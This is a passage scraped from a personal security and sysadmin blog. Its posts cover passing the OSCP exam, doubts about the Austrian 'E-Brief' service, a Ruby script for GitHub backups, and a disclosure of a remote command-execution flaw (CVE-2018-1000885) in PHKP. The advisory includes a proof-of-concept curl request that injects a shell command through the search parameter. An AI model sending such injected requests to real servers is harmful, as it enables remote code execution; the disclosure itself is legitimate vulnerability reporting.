arguments="0=node&amp;1=275&amp;2=comment&amp;3=comment" token="n9usVfEUtf7byg_DtY0U2-fcm665S_LxRZ3k1aaN8cE"></drupal-render-placeholder> </section> Mon, 14 Jan 2019 20:06:52 +0000 Hoti 275 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges#comments https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges#comments I "tried harder" and passed the exam https://tech.feedyourhead.at/content/oscp <span class="field field--name-title field--type-string field--label-hidden">I &quot;tried harder&quot; and passed the exam</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="oscp" data-entity-type="file" data-entity-uuid="8718df2a-31d3-46d8-a49b-f690e04168f1" src="/sites/default/files/inline-images/offsec-student-certified-emblem-rgb-oscp_0.png" /></p> <p>The "<a href="https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/">Offensive Security Certified Professional</a>" is a unique penetration testing certification offered by the company "<a href="https://www.offensive-security.com/">Offensive Security</a>". After registering the students will receive course materials and a VPN connection to a huge lab with many vulnerable servers. Everything has to be learned autodidactically using the course materials and the Internet. The grand finale of this certification is the 24-hours exam where the students have to proof that they have the knowledge and the routine to penetrate systems in a quite short amount of time.</p> <p>I tried to complete the course and the lab in two months and I really did all the exercises and studied the complete materials. Even if I was experienced before, I learned a lot. To hack the different servers in the lab was so much fun, but also kind of exhausting. I was so excited and full with ideas in my mind, that I had some troubles with sleeping. Due to private life, I had not so much time for studying. That's why it took me one month for the course materials and exercises. After that I just had another month for the lab. There is am IRC channel at <a href="https://freenode.net/">Freenode</a> and a forum. Both can be very helpful for the lab. My recommendation for people who want to earn the extra points that you can get by reporting the lab: start writing the report immediately when the lab starts. It takes much time to write the report and the exercises.</p> <p>The exam wasn't as hard as I expected. Although it could get very difficult if you get stuck with something. In the end it is a creative process with all it's traps. I was very lucky with some things and found them quickly. After 8 hours I had most of the points and at the end I completed all exercises. The exam report is a lot of work. It took me a while and I regretted that I didn't start writing immediately after the exam was over. I really really recommend to document as detailed as possible during the exam.</p> <p>I want to thank the "Offensive Security"-team for this amazing experience.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 08 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=274&amp;2=comment&amp;3=comment" token="5mF1AQi1zyVAq21jQb-cngdGJm97tvmeo2RL85JMvtk"></drupal-render-placeholder> </section> Tue, 08 Jan 2019 11:48:03 +0000 Hoti 274 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/oscp#comments https://tech.feedyourhead.at/content/oscp#comments Merry Christmas https://tech.feedyourhead.at/content/xmas2018 <span class="field field--name-title field--type-string field--label-hidden">Merry Christmas</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I wish you a merry christmas and a happy new year.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 24 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/xmas" hreflang="en">xmas</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=273&amp;2=comment&amp;3=comment" token="YZkNGvuuNab3dv_BR_Q8ZnEaXtQJISCZjMiruc4cv34"></drupal-render-placeholder> </section> Mon, 24 Dec 2018 19:04:29 +0000 Hoti 273 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/xmas2018#comments https://tech.feedyourhead.at/content/xmas2018#comments What the hack is "E-Brief" https://tech.feedyourhead.at/content/words-about-e-post <span class="field field--name-title field--type-string field--label-hidden">What the hack is &quot;E-Brief&quot;</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This week I received an email from my bank company. They advertised that they are cooperating with the "Post"(Austrian mailprovider) and recommended to use "E-Brief" for notifications from them. My first thought was: "it's E-Mail". Because E-Brief translated from german means: "E-Mail". So I took a look in the FAQ's from the Post and they wrote things like(translated from German):</p> <blockquote> <p>Your E-"Letter Box" from everywhere</p> </blockquote> <blockquote> <p>High security</p> </blockquote> <blockquote> <p>E-Brief is not E-Mail. Documents, policies and bills will be transmitted digitally and delivered to your "E-Briefkasten"(Letterbox). It's not just comfortable and fast but also secure. Emails are transmitted insecure but E-Brief is delivered in a secure and certificated portal(E-Briefkasten).</p> </blockquote> <p>I have my own mailserver that can DANE. So E-mails aren't always transported insecure. We have standardizes protocols and techniques for that, that's why I wonder what the Post does differently. Maybe they do end-to-end encryption. But why didn't they mention that in the FAQs? If they do end-to-end encryption, are the private keys secured with a password that only the person who receives the email knows? I had a lot of questions, so I wrote the Post an Email and just asked:</p> <blockquote> <p>I would like to know more technical details about E-Brief. Which methods are used for transport encryption? Which methods are used for content encryption? How do you store the data? Do you do backups? Is the backup encrypted? How do you ensure that only the recipient can access to the mailbox? Is your webapplication secure and what do you do to ensure that it is?  </p> </blockquote> <p>I waited very naively for a honest reply and after a few days I got at least a reply(translated from German):</p> <blockquote> <p>Of course we do end-to-end encryption. For security reasons we are not allowed to give you more details about E-Brief</p> </blockquote> <p>It is very interesting that they didn't mention end-to-end encryption in the FAQ's. When it comes to encryption, I prefer open standards and open-source. I want to know whats behind it in order to trust it or not. In the digital world "THINGS" happen so easily. "THINGS" like manipulating data or unauthorized reading it. Today data can be accessed from everywhere and if we are dealing with very important data, we have to be aware of the dangers.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 08 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=272&amp;2=comment&amp;3=comment" token="kiyx9mxMz42HhQhOz9MKiOMvCbuLYfrZf675ph_t41w"></drupal-render-placeholder> </section> Sat, 08 Dec 2018 09:50:17 +0000 Hoti 272 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/words-about-e-post#comments https://tech.feedyourhead.at/content/words-about-e-post#comments Fourth Anniversary https://tech.feedyourhead.at/content/fourth-anniversary <span class="field field--name-title field--type-string field--label-hidden">Fourth Anniversary</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This blog really became 4 years old. When I started to write it was mostly for practicing written english. But my intention was always to give something back to the open-source community. I failed terribly with the first point. My english is as bad as it was before, but I have readers and get responses to some articles. It seems that I didn't failed with "giving something back to the open-source community".</p> <p>Thank you to all my readers.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 07 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/98" hreflang="en">Anniversary</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class="title">Comments</h2> <a id="comment-105"></a> <article data-comment-user-id="0" about="/comment/105" typeof="schema:Comment" class="comment js-comment by-anonymous"> <mark class="hidden" data-comment-timestamp="1544600870"></mark> <footer class="comment__meta"> <article typeof="schema:Person" about="/user/0" class="profile"> </article> <p class="comment__submitted"><span rel="schema:author">Submitted by <span lang="" typeof="schema:Person" property="schema:name" datatype="">papers (not verified)</span> on Dec 11 2018</span> <span property="schema:dateCreated" content="2018-12-11T15:48:06+00:00" class="rdf-meta hidden"></span> </p> <a href="/comment/105#comment-105" hreflang="en">Permalink</a> </footer> <div class="content"> <h3 property="schema:name" datatype=""><a href="/comment/105#comment-105" class="permalink" rel="bookmark" hreflang="en">Congrats man, i like reading…</a></h3> <div property="schema:text" class="clearfix text-formatted field field--name-comment-body field--type-text-long field--label-hidden field__item"><p>Congrats man, i like reading this stuff</p> </div> <drupal-render-placeholder callback="comment.lazy_builders:renderLinks" arguments="0=105&amp;1=default&amp;2=en&amp;3=" token="ppj_YZblhyLltgcZyL4yIqyhBe4Bxv6BEhjhRUtuGmU"></drupal-render-placeholder> </div> </article> <a id="comment-106"></a> <article data-comment-user-id="1" about="/comment/106" typeof="schema:Comment" class="comment js-comment by-node-author"> <mark class="hidden" data-comment-timestamp="1544601032"></mark> <footer class="comment__meta"> <article typeof="schema:Person" about="/users/hoti" class="profile"> </article> <p class="comment__submitted"><span rel="schema:author">Submitted by <span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span> on Dec 12 2018</span> <span property="schema:dateCreated" content="2018-12-12T07:50:32+00:00" class="rdf-meta hidden"></span> </p> <a href="/comment/106#comment-106" hreflang="en">Permalink</a> </footer> <div class="content"> <h3 property="schema:name" datatype=""><a href="/comment/106#comment-106" class="permalink" rel="bookmark" hreflang="en">Thanks</a></h3> <div property="schema:text" class="clearfix text-formatted field field--name-comment-body field--type-text-long field--label-hidden field__item">Thanks.</div> <drupal-render-placeholder callback="comment.lazy_builders:renderLinks" arguments="0=106&amp;1=default&amp;2=en&amp;3=" token="XMZCqI1e2uxFzIBNe34ps97hw_BEkZdD2ziihGJFPcE"></drupal-render-placeholder> </div> </article> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=271&amp;2=comment&amp;3=comment" token="3omfIKIFNkDTIKTbYErfq32WVV_KNos59DgQCdwB8fI"></drupal-render-placeholder> </section> Wed, 07 Nov 2018 15:24:22 +0000 Hoti 271 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/fourth-anniversary#comments https://tech.feedyourhead.at/content/fourth-anniversary#comments Full Disclosure: Remote-Command-Execution in PHKP https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp <span class="field field--name-title field--type-string field--label-hidden">Full Disclosure: Remote-Command-Execution in PHKP</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>System affected: <a href="https://el-tramo.be/phkp/">PHKP</a></li> <li>Software-Version: including commit <span class="sha-block"><span class="sha user-select-contain">88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b</span></span></li> <li>User-Interaction: Not required</li> <li>Impact: Remote-Code-Execution</li> <li>CVE: CVE-2018-1000885</li> </ul><h3>Detailed Description</h3> <p>According to the project-page "PHKP is an implementation of the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00">OpenPGP HTTP Keyserver Protocol (HKP)</a> in PHP". Due to unsanitized query parameters in the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00#page-3">/pks/lookup-call</a> any shell-command can be injected and executed remotely.</p> <p>In line <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L106-L107">106 of phkp.php the search-parameter "/pks/lookup&amp;op=index" is assigned without any checks and in line 107</a> this variable will be used as a parameter of exec():</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">  <span style="color: #000088;">$search</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$vars</span><span style="color: #009900;">[</span><span style="color: #0000ff;">'search'</span><span style="color: #009900;">]</span><span style="color: #339933;">;</span> <span style="color: #000088;">$pgp_result</span> <span style="color: #339933;">=</span> pgp_exec<span style="color: #009900;">(</span><span style="color: #0000ff;">"--list-public-keys --list-keys <span style="color: #006699; font-weight: bold;">$search</span>"</span><span style="color: #339933;">,</span> <span style="color: #000088;">$output</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span> </pre></div> <p>It is possible to inject any shell commands using the search-parameter:</p> <p><span class="geshifilter"><code class="bash geshifilter-bash">curl http:<span style="color: #000000; font-weight: bold;">//</span>localhost:<span style="color: #000000;">8008</span><span style="color: #000000; font-weight: bold;">/</span>pks<span style="color: #000000; font-weight: bold;">/</span>lookup?<span style="color: #007800;">op</span>=index<span style="color: #000000; font-weight: bold;">&amp;</span><span style="color: #007800;">search</span>=js<span style="color: #000000; font-weight: bold;">@</span>example.com; <span style="color: #c20cb9; font-weight: bold;">id</span></code></span></p> <p>In line <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L116-L117">116 and 117</a> the same problem occurs again for the "/pks/lookup&amp;op=get"-call. That means that the remote-code-execution occurs in two places.</p> <h3>Proof-Of-Concept</h3> <p>A ordinary lookup coud be the following:</p> <p><img alt="Normal phkp-lookup" data-entity-type="file" data-entity-uuid="83e75e46-8ca9-4cfe-a717-ca2535521734" src="/sites/default/files/inline-images/2018-10-08-13%3A14%3A35.png" /></p> <p>By injecting shell commands to the search-parameter, it is possible to execute any command:</p> <p><img alt="phkp rce" data-entity-type="file" data-entity-uuid="ba2c925d-adac-4faf-a1bb-d5477140702e" src="/sites/default/files/inline-images/phkp-rce.png" /></p> <h3>Mitigation</h3> <p>Currently there is no fix for this bug. The <a href="https://github.com/remko/phkp/issues/1">author was informed on Jul 18 2018</a>. A solution for this problem might be the <a href="http://php.net/manual/en/function.escapeshellcmd.php">escapeshellcmd()-function</a>.</p> <h3>Credits</h3> <p>The remote-code-execution bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 08 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=270&amp;2=comment&amp;3=comment" token="cK_p_W5RhnZKxZrNTKP6lTqyEefrgqU5bitXNJBBEVM"></drupal-render-placeholder> </section> Mon, 08 Oct 2018 11:23:39 +0000 Hoti 270 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp#comments https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp#comments Happy 20 Birthday to Nmap https://tech.feedyourhead.at/content/happy-20-birthday-nmap <span class="field field--name-title field--type-string field--label-hidden">Happy 20 Birthday to Nmap</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>The legendary portscanner <a href="https://nmap.org/">nmap</a> was  released 20 years ago in <a href="https://nmap.org/p51-11.html">Phrack #51</a>. Happy Birthday nmap.</p> <p><img alt="nmap 20 birthday" data-entity-type="file" data-entity-uuid="662e5bfa-c7cd-476d-b63c-988e5a8db770" src="/sites/default/files/inline-images/2018-09-01-23%3A06%3A20.png" /></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Sep 01 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=269&amp;2=comment&amp;3=comment" token="HsrgLvKjNiIQag4zn86arzYiVNpY9hN-qBnGmznvEHA"></drupal-render-placeholder> </section> Sat, 01 Sep 2018 21:06:00 +0000 Hoti 269 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/happy-20-birthday-nmap#comments https://tech.feedyourhead.at/content/happy-20-birthday-nmap#comments Happy Sysadminday https://tech.feedyourhead.at/content/sysadminday2018 <span class="field field--name-title field--type-string field--label-hidden">Happy Sysadminday</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Sysadmins are the heros who bring back our cat-pictures from the heights of the filesystem-tree. So let's honour our firefighters of the internet.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jul 27 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=268&amp;2=comment&amp;3=comment" token="Wssl8ZtZSOX4u3ylGkaWHQxezQssIMaRhR4OT18LOm8"></drupal-render-placeholder> </section> Fri, 27 Jul 2018 08:12:55 +0000 Hoti 268 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/sysadminday2018#comments https://tech.feedyourhead.at/content/sysadminday2018#comments Now is a good time to backup our github-repos https://tech.feedyourhead.at/content/now-is-a-good-time-to-backup-our-github-repos <span class="field field--name-title field--type-string field--label-hidden">Now is a good time to backup our github-repos</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Many people are scared because <a href="https://news.microsoft.com/2018/06/04/microsoft-to-acquire-github-for-7-5-billion/">Microsoft bought GitHub</a>. I wonder why people are so shocked now. Github is just another cloud-thingy and cloud means: "it's just the computer of someone else". If "someone else" will shutdown or wipe his computer, then we better have backups. Having this in our minds I would say that it's time to make (auto)backups. I wrote this little ruby-script that clones all public repositories of a user into a directory. If the repositories already exist locally, then this script will just make a "git-pull".</p> <div class="geshifilter"><pre class="ruby geshifilter-ruby" style="font-family:monospace;"><span style="color:#008000; font-style:italic;">#!/usr/bin/env ruby</span> &nbsp; <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'net/http'</span> <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'json'</span> <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'fileutils'</span> &nbsp; directory = <span style="color:#996600;">&quot;./&quot;</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">def</span> help warn <span style="color:#996600;">&quot;usage: #{$PROGRAM_NAME} &lt;github-user&gt; [ &lt;dst-directory&gt; ]&quot;</span> <span style="color:#CC0066; font-weight:bold;">exit</span> <span style="color:#006666;">1</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; <span style="color:#008000; font-style:italic;"># got this function from stackoverflow.com: </span> <span style="color:#008000; font-style:italic;"># stackoverflow.com/questions/2108727/which-in-ruby-checking-if-program-exists-in-path-from-ruby</span> <span style="color:#9966CC; font-weight:bold;">def</span> which<span style="color:#006600; font-weight:bold;">&#40;</span>cmd<span style="color:#006600; font-weight:bold;">&#41;</span> exts = ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATHEXT'</span><span style="color:#006600; font-weight:bold;">&#93;</span> ? ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATHEXT'</span><span style="color:#006600; font-weight:bold;">&#93;</span>.<span style="color:#CC0066; font-weight:bold;">split</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">';'</span><span style="color:#006600; font-weight:bold;">&#41;</span> : <span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">''</span><span style="color:#006600; font-weight:bold;">&#93;</span> ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATH'</span><span style="color:#006600; font-weight:bold;">&#93;</span>.<span style="color:#CC0066; font-weight:bold;">split</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#CC00FF; font-weight:bold;">File</span>::PATH_SEPARATOR<span style="color:#006600; font-weight:bold;">&#41;</span>.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span>path<span style="color:#006600; font-weight:bold;">|</span> exts.<span style="color:#9900CC;">each</span> <span style="color:#006600; font-weight:bold;">&#123;</span> <span style="color:#006600; font-weight:bold;">|</span>ext<span style="color:#006600; font-weight:bold;">|</span> exe = <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">join</span><span style="color:#006600; font-weight:bold;">&#40;</span>path, <span style="color:#996600;">&quot;#{cmd}#{ext}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#0000FF; font-weight:bold;">return</span> exe <span style="color:#9966CC; font-weight:bold;">if</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">executable</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>exe<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">&amp;&amp;</span> !<span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>exe<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">&#125;</span> <span style="color:#9966CC; font-weight:bold;">end</span> <span style="color:#0000FF; font-weight:bold;">return</span> <span style="color:#0000FF; font-weight:bold;">nil</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; gitbin = which<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;git&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">if</span> gitbin.<span style="color:#0000FF; font-weight:bold;">nil</span>? warn <span style="color:#996600;">&quot;git-binary not found&quot;</span> <span style="color:#CC0066; font-weight:bold;">exit</span> <span style="color:#006666;">1</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">if</span> ARGV.<span style="color:#9900CC;">length</span> <span style="color:#006600; font-weight:bold;">&lt;</span> <span style="color:#006666;">1</span> <span style="color:#006600; font-weight:bold;">||</span> ARGV.<span style="color:#9900CC;">length</span> <span style="color:#006600; font-weight:bold;">&gt;</span> <span style="color:#006666;">2</span> help <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; gituser = ARGV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#006666;">0</span><span style="color:#006600; font-weight:bold;">&#93;</span> directory = ARGV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#006666;">1</span><span style="color:#006600; font-weight:bold;">&#93;</span> <span style="color:#9966CC; font-weight:bold;">if</span> ARGV.<span style="color:#9900CC;">length</span> == <span style="color:#006666;">2</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">unless</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>directory<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#CC00FF; font-weight:bold;">FileUtils</span>::mkdir_p directory <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; uri = <span style="color:#CC00FF; font-weight:bold;">URI</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;https://api.github.com/users/#{gituser}/repos&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; resp = <span style="color:#6666ff; font-weight:bold;">Net::HTTP</span>.<span style="color:#9900CC;">get</span><span style="color:#006600; font-weight:bold;">&#40;</span>uri<span style="color:#006600; font-weight:bold;">&#41;</span> parsed = JSON.<span style="color:#9900CC;">parse</span><span style="color:#006600; font-weight:bold;">&#40;</span>resp<span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; parsed.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span><span style="color:#CC0066; font-weight:bold;">p</span><span style="color:#006600; font-weight:bold;">|</span> <span style="color:#9966CC; font-weight:bold;">if</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;#{directory}/#{p['name']}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#CC0066; font-weight:bold;">system</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;cd #{directory}/#{p['name']} &amp;&amp; #{gitbin} pull&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">else</span> <span style="color:#CC0066; font-weight:bold;">system</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;#{gitbin} clone https://github.com/#{p['full_name']} #{directory}/#{p['name']}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">end</span> <span style="color:#9966CC; font-weight:bold;">end</span></pre></div> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jun 07 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/103" hreflang="en">Open-Source</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/backup" hreflang="en">Backup</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/shell" hreflang="en">Shell</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=267&amp;2=comment&amp;3=comment" token="oPcbvqzYUcugBxbk0j0w2JLHdMWOfeGFn5WU98XCfbI"></drupal-render-placeholder> </section> Thu, 07 Jun 2018 10:41:24 +0000 Hoti 267 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/now-is-a-good-time-to-backup-our-github-repos#comments https://tech.feedyourhead.at/content/now-is-a-good-time-to-backup-our-github-repos#comments cryptorecord 0.9.2 released https://tech.feedyourhead.at/content/cryptorecord-0-9-2-released <span class="field field--name-title field--type-string field--label-hidden">cryptorecord 0.9.2 released</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I proudly pronounce the first 